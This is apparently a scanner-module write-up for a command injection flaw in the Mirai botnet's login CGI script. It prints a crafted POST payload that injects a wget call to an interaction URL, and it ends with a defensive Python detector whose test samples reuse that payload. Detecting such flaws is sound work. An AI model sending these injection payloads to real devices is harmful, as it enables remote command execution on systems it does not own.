By kannthu
The "Mirai - Remote Command Injection" module is designed to detect a critical vulnerability in the Mirai software. Mirai is malware that targets Internet of Things (IoT) devices and turns them into a botnet. This module specifically targets the login CGI script in Mirai, where the key parameter is not properly sanitized, leading to a command injection vulnerability. The severity of this vulnerability is classified as critical.
This module was authored by gy741.
If exploited, this vulnerability allows an attacker to execute arbitrary commands on the affected device. This can lead to unauthorized access, data theft, and potential disruption of services.
The "Mirai - Remote Command Injection" module works by sending a crafted HTTP request to the target device's login CGI script. The request includes a payload that exploits the command injection vulnerability. Here is an example of the HTTP request:

POST /cgi-bin/login.cgi HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded

key=';`wget http://<InteractionURL>`;#

The module also includes matching conditions to determine whether the target device is vulnerable. In this case, it checks whether the interaction protocol is HTTP, meaning the interaction URL embedded in the payload received an HTTP request.
If the module detects a match, it will report the vulnerability.
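On the defending side, the same request shape can be flagged in captured traffic or a reverse-proxy hook. The following is an added example, not part of the Vidoc module: it checks POST requests to /cgi-bin/login.cgi for shell metacharacters in the decoded key field. The metacharacter set, the function names and the sample requests (host example.test) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/cgi-bin/login.cgi"
# Characters that let a value break out into a shell command (assumed policy).
SHELL_META = re.compile(r"[;`|&\n]|\$\(")

def form_fields(body):
    """Yield percent-decoded (name, value) pairs from a urlencoded body."""
    # Split on '&' only, so a raw ';' stays inside the value on every Python version.
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)

def is_key_injection(raw_request):
    """True for a POST to login.cgi whose 'key' field holds shell metacharacters."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return False
    if parts[1].split("?", 1)[0] != TARGET_PATH:
        return False
    fields = form_fields(body.rstrip("\n"))
    return any(n == "key" and SHELL_META.search(v) for n, v in fields)

def sample(method, path, body):
    """Build a constructed request; example.test is a placeholder host."""
    return "\r\n".join([
        f"{method} {path} HTTP/1.1",
        "Host: example.test",
        "Content-Type: application/x-www-form-urlencoded",
        "",  # blank line separating headers from body
        body,
    ])

# Constructed samples: the page's probe, a percent-encoded form of it, and benign traffic.
SAMPLES = {
    "page_probe": sample("POST", TARGET_PATH, "key=';`wget http://<InteractionURL>`;#"),
    "encoded_probe": sample("POST", TARGET_PATH,
                            "key=%27%3B%60wget+http://<InteractionURL>%60%3B%23"),
    "normal_login": sample("POST", TARGET_PATH, "key=Spring2024pass"),
    "other_path": sample("POST", "/cgi-bin/status.cgi", "key=a;b"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {'ALERT' if is_key_injection(raw) else 'ok'}")
```

Decoding before matching is what catches the percent-encoded form; matching on the raw body alone would miss it.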